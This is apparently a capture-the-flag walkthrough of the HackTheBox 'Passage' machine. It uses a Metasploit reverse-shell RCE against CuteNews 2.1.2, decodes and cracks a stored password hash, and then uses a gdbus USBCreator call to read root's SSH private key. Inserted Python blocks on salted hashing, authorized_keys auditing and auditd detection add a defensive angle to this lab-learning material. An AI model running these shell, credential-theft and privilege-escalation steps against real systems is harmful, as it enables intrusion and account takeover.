Passage HackTheBox WalkThrough

This is the Passage HackTheBox machine walkthrough. In this writeup I have demonstrated step by step how I rooted the Passage HTB machine. Before starting, let us know something about this machine. It is a Linux box with IP address 10.10.10.206 and a security level of medium assigned by its maker.
First of all, connect your local machine to the VPN so that you can access the lab machines, and confirm connectivity to the Passage machine by pinging the IP address 10.10.10.206. If all is correct, start hacking.
As usual, I began by scanning the IP address so that I could get some starting points. I used nmap for this task and the result is below.
Scanning
$ nmap -sC -sV -oN passage_scan 10.10.10.206

Nmap revealed that ports 22 and 80 are open. An SSH server is running on port 22 and an Apache2 web server on port 80. Since a web server is running on port 80, there must be a website hosted on this IP. Going to the URL http://10.10.10.206/ I found a webpage showing Passage News.

Scrolling to the bottom, I found the note Powered by : CuteNews. I immediately googled CuteNews and found that it is an open-source Content Management System (CMS) for hosting news articles. Since it is a CMS, there must be some user(s) who write blog posts on this website. After spending some time I got two email addresses, [email protected] & [email protected].
So we have two users, paul and nadav, extracted from their emails. I added them to my notes and proceeded with further enumeration. Checking the page source by pressing CTRL+U, I found the URL http://10.10.10.206/CuteNews, which is the installation folder of CuteNews. Going to this page, I found register & login options and that the running version of CuteNews is 2.1.2.

Whenever I get some information about a piece of software or a CMS, I immediately search for public exploits for it. So I used searchsploit [a CLI tool to query the exploit-db database] to search for an exploit for CuteNews 2.1.2.
Searching Public Exploit
$ searchsploit CuteNews 2.1.2

There is a Remote Code Execution exploit for CuteNews 2.1.2 and it also has a Metasploit module. So I launched Metasploit to exploit this vulnerability. But searching for CuteNews in Metasploit gave the message No results found from search.
Since this module is not present in metasploit-framework, we have to download it explicitly and add it to our metasploit-framework. The exploit link is https://www.exploit-db.com/download/46698 . I followed the steps below to integrate the module into Metasploit.
$msfdb run
msf5 > search cutenews
msf5 > wget 'https://www.exploit-db.com/download/46698'
msf5 > mv 46698 /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb
We have to add a comma [,] to this exploit because there is a syntax error in it; see this issue at the rapid7 repo.
msf5 > vi /usr/share/metasploit-framework/modules/exploits/unix/webapp/cutenews_avatar_rce.rb

After adding the exploit and making the change, we have to reload all modules.
msf5 > reload_all
msf5 > search cutenews

Now we have successfully added the CuteNews RCE exploit to our metasploit-framework. After loading the CuteNews module, the msf command show options, which lists the available options, also shows USERNAME & PASSWORD. So CuteNews 2.1.2 actually has an authenticated RCE vulnerability, because it requires a username and password too. As we already have a register button at URL http://10.10.10.206/CuteNews, I registered a user with the name test1 & password test1.

It is time to get a meterpreter shell. I used the above credentials to get the shell.
Getting Shell
msf5 > use exploit/unix/webapp/cutenews_avatar_rce
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set RHOSTS 10.10.10.206
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set payload php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set LHOST 10.10.14.191
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set USERNAME test1
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set PASSWORD test1
msf5 exploit(unix/webapp/cutenews_avatar_rce) > set VHOST 10.10.14.191
msf5 exploit(unix/webapp/cutenews_avatar_rce) > exploit
meterpreter > sysinfo
Note: If your meterpreter shell doesn't work, background the shell and try to exploit again 3-4 times. If it still doesn't work, use the non-staged payload php/meterpreter_reverse_tcp instead of the staged payload.

Got a meterpreter shell. I upgraded it to a fully interactive Linux shell so that I could run all Linux commands remotely.
Upgrading Shell
meterpreter > shell
~python -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm-256color
$ CTRL+Z   # to background the shell
$ stty raw -echo
$ fg       # then press enter twice to foreground the session

After some enumeration I found a file named lines inside the directory /var/www/html/CuteNews/cdata/users/. It contains the information of all users in base64-encoded form. After decoding it I found the SHA256 hash of user paul.
$ cat /var/www/html/CuteNews/cdata/users/lines


paul : e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
Luckily, I got the password for this hash from Crackstation.

So we have the credentials paul : atlanta1
I switched to user paul using the password atlanta1.
$ su paul
~atlanta1
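Why a lookup service could return this password at all: the hash in the lines file is a fast, unsalted SHA-256 of the password, so one precomputed table serves every site using that scheme. The following is an added example, not code from the writeup or from CuteNews; the wordlist and the salted alternative (scrypt with a per-user random salt) are constructed for the demo.

```python
# Added example (not from the Passage writeup or CuteNews): why an unsalted
# SHA-256 password hash falls to a lookup table, and what a salted, slow hash
# changes. The wordlist below is a constructed stand-in for a public table.
import hashlib
import hmac
import os

WORDLIST = ["password", "letmein", "summer2020", "atlanta1", "qwerty"]

# Memory-hard parameters; 128 * r * n = 16 MiB of RAM per guess.
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, dklen=32)


def sha256_unsalted(password):
    """Fast, unsalted SHA-256, the form the lines file held for paul."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(words):
    """Precompute digest -> plaintext once; no salt means the table is reusable everywhere."""
    return {sha256_unsalted(w): w for w in words}


def lookup_unsalted(digest_hex, table):
    """Recover a plaintext by table lookup; None when the hash is not in the table."""
    return table.get(digest_hex.lower())


def hash_salted(password, salt=None):
    """Per-user random salt plus scrypt; returns (salt, digest) to store together."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return salt, digest


def verify_salted(password, salt, digest):
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return hmac.compare_digest(candidate, digest)


def demo():
    """Returns (recovered plaintext, salted digests differ, salted verify ok, salted lookup)."""
    table = build_lookup_table(WORDLIST)
    stored = sha256_unsalted("atlanta1")         # what an unsalted store keeps
    recovered = lookup_unsalted(stored, table)   # immediate hit, no guessing
    salt_a, dig_a = hash_salted("atlanta1")
    salt_b, dig_b = hash_salted("atlanta1")      # same password, different salt
    salted_lookup = lookup_unsalted(dig_a.hex(), table)  # the table is useless here
    return recovered, dig_a != dig_b, verify_salted("atlanta1", salt_a, dig_a), salted_lookup


if __name__ == "__main__":
    print(demo())
```

The point for a defender reviewing a CMS install is the storage scheme, not the password strength: with a salt and a slow KDF the same table would have to be rebuilt per user at 16 MiB per guess.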

Capture User Flag
$ cat user.txt

Privilege Escalation
After some initial enumeration I found that the authorized_keys file of user paul contains the key of user nadav. It means user paul can connect to user nadav locally via SSH.

$ ssh nadav@localhost

Successfully logged in to nadav through SSH. We are nadav now.
After some more enumeration I did not find any privilege escalation vector. So I ran linpeas.sh [a post-exploitation enumeration script] for help, and it found that gdbus could be used to escalate privileges. I did not know how to escalate privileges using gdbus, so I googled privilege escalation using gdbus and got this first article.
According to this article, gdbus allows a user to overwrite arbitrary files on the file system, as root, with no password prompt. Or we can say any user can copy the contents of root's files without any password. So I used this command to copy the id_rsa key of the root user, so that using this key I could SSH in as root.
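The lateral move above works because one SSH key is trusted by more than one account. An administrator can catch that condition before an attacker does by auditing every authorized_keys file on the host. The script below is an added example, not part of the writeup: it parses authorized_keys lines (skipping an optional options field), fingerprints each key the way OpenSSH does (SHA256 of the decoded blob), and reports keys trusted by several users as well as keys whose comment names a different local user. The key blobs and file contents are constructed for the demo.

```python
# Added example (not from the writeup): audit authorized_keys files for keys
# shared across accounts or whose comment names another local user.
import base64
import hashlib
import shlex

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")

# Constructed key material; real blobs are base64 of the wire-format public key.
KEY_A = base64.b64encode(b"constructed key material A").decode()
KEY_B = base64.b64encode(b"constructed key material B").decode()

# Constructed sample: {username: contents of ~user/.ssh/authorized_keys}
SAMPLE = {
    "paul": f"ssh-rsa {KEY_A} paul@passage\nssh-rsa {KEY_B} nadav@passage\n",
    "nadav": f"ssh-rsa {KEY_B} nadav@passage\n",
    "root": f'command="/usr/bin/backup",no-pty ssh-ed25519 {KEY_A} backup-job\n',
}


def fingerprint(blob_b64):
    """OpenSSH-style fingerprint: SHA256 of the decoded blob, base64 without padding."""
    raw = base64.b64decode(blob_b64)
    return "SHA256:" + base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")


def parse_authorized_keys(text):
    """Return [(fingerprint, keytype, comment)] for each key line; blanks and comments skipped."""
    keys = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            fields = shlex.split(line)   # keeps quoted option values together
        except ValueError:
            fields = line.split()
        i = 0
        while i < len(fields) and fields[i] not in KEY_TYPES:
            i += 1                       # skip the optional options field
        if i + 1 >= len(fields):
            continue                     # no key material on this line
        keys.append((fingerprint(fields[i + 1]), fields[i], " ".join(fields[i + 2:])))
    return keys


def find_shared_keys(files):
    """{fingerprint: sorted users} for every key trusted by more than one account."""
    seen = {}
    for user, text in files.items():
        for fp, _keytype, _comment in parse_authorized_keys(text):
            seen.setdefault(fp, set()).add(user)
    return {fp: sorted(users) for fp, users in seen.items() if len(users) > 1}


def find_foreign_comments(files):
    """[(owner, comment, named_user)] where a key's comment names a different local user."""
    users = set(files)
    hits = []
    for owner, text in files.items():
        for _fp, _keytype, comment in parse_authorized_keys(text):
            named = comment.split("@", 1)[0]
            if named in users and named != owner:
                hits.append((owner, comment, named))
    return hits


if __name__ == "__main__":
    for fp, users in find_shared_keys(SAMPLE).items():
        print(f"shared key {fp} trusted by: {', '.join(users)}")
    for owner, comment, named in find_foreign_comments(SAMPLE):
        print(f"{owner}'s authorized_keys trusts a key labelled for {named} ({comment})")
```

On a live host, build the dict from each `~user/.ssh/authorized_keys` plus any `AuthorizedKeysFile` paths set in sshd_config; a shared fingerprint means whoever holds that private key can reach every listed account.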
$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/key.txt true
$ cat /tmp/key.txt
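From the defender's side, the gdbus call above is an ordinary process execution and can be recorded by auditd; the question is how to pick it out of the EXECVE records. The script below is an added example, not from the writeup or from linpeas: it parses auditd EXECVE lines (quoted and hex-encoded arguments), flags gdbus calls whose method belongs to com.ubuntu.USBCreator, and reports the source and destination paths. The audit lines and the auditd rule string are constructed for the demo; the rule assumes an auditd build that supports the `-F exe=` filter.

```python
# Added example (not from the writeup): find gdbus calls to the USBCreator
# D-Bus service in auditd EXECVE records. Sample lines are constructed and
# model the command shown in the writeup.
import re

# Assumed auditd rule producing an EXECVE record for every gdbus invocation.
AUDIT_RULE = "-a always,exit -F arch=b64 -S execve -F exe=/usr/bin/gdbus -k gdbus_calls"

# Source paths no unprivileged user should be able to read through a root service.
SENSITIVE_PREFIXES = ("/root/", "/etc/shadow", "/etc/sudoers", "/home/")

# Constructed sample records. auditd quotes plain arguments and hex-encodes
# arguments containing spaces or special characters (a10 below is "/tmp/my key").
SAMPLE_AUDIT = """\
type=EXECVE msg=audit(1600000000.101:2001): argc=12 a0="gdbus" a1="call" a2="--system" a3="--dest" a4="com.ubuntu.USBCreator" a5="--object-path" a6="/com/ubuntu/USBCreator" a7="--method" a8="com.ubuntu.USBCreator.Image" a9="/root/.ssh/id_rsa" a10=2F746D702F6D79206B6579 a11="true"
type=EXECVE msg=audit(1600000000.205:2002): argc=3 a0="gdbus" a1="introspect" a2="--system"
type=EXECVE msg=audit(1600000000.300:2003): argc=2 a0="ls" a1="-la"
"""

ARG_RE = re.compile(r'(?:^|\s)a(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')
EVENT_RE = re.compile(r"msg=audit\(([^)]+)\)")


def parse_execve(line):
    """Return (event_id, argv) for an EXECVE record, or None for any other record type."""
    if not line.startswith("type=EXECVE"):
        return None
    m = EVENT_RE.search(line)
    event = m.group(1) if m else ""
    argv = {}
    for idx, quoted, hexed in ARG_RE.findall(line):
        argv[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace") if hexed else quoted
    return event, [argv[i] for i in sorted(argv)]


def flag_usbcreator(event, argv):
    """Report a gdbus 'call' whose --method is on com.ubuntu.USBCreator, else None."""
    if len(argv) < 2 or argv[0].rsplit("/", 1)[-1] != "gdbus" or argv[1] != "call":
        return None
    if "--method" not in argv:
        return None
    i = argv.index("--method")
    method = argv[i + 1] if i + 1 < len(argv) else ""
    if not method.startswith("com.ubuntu.USBCreator."):
        return None
    paths = argv[i + 2:]                  # positional args after the method name
    source = paths[0] if paths else ""
    dest = paths[1] if len(paths) > 1 else ""
    return {"event": event, "method": method, "source": source, "dest": dest,
            "sensitive": source.startswith(SENSITIVE_PREFIXES)}


def scan_audit_lines(text):
    """Run every EXECVE record through the detector and collect the findings."""
    findings = []
    for line in text.splitlines():
        parsed = parse_execve(line)
        if parsed:
            hit = flag_usbcreator(*parsed)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_audit_lines(SAMPLE_AUDIT):
        print(f"[{f['event']}] {f['method']} {f['source']} -> {f['dest']} sensitive={f['sensitive']}")
```

Pair the rule with `ausearch -k gdbus_calls` (or ship the records to a SIEM) and alert on any USBCreator method whose source path is under /root or /etc; the same detector generalises to other D-Bus services by changing the method prefix.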

We have got the private key of user root. So I copied this key into the file root_key on my local PC. After changing the permissions of root_key to 600, I connected as root using SSH.
$ vi root_key
$ chmod 600 root_key
$ ssh -i root_key [email protected]
root@passage:~# whoami && id

We have successfully escalated privileges to root. Now we can capture the root flag.
Capture Root Flag
$ cat root.txt

This is how I rooted Passage on HackTheBox. I learnt a lot from hunting this box, and I hope you guys have also learnt something new from it. Thanks for reading this writeup. For any suggestions or queries related to the walkthrough, feel free to contact us at [email protected].
You can read walkthroughs of similar machines here.
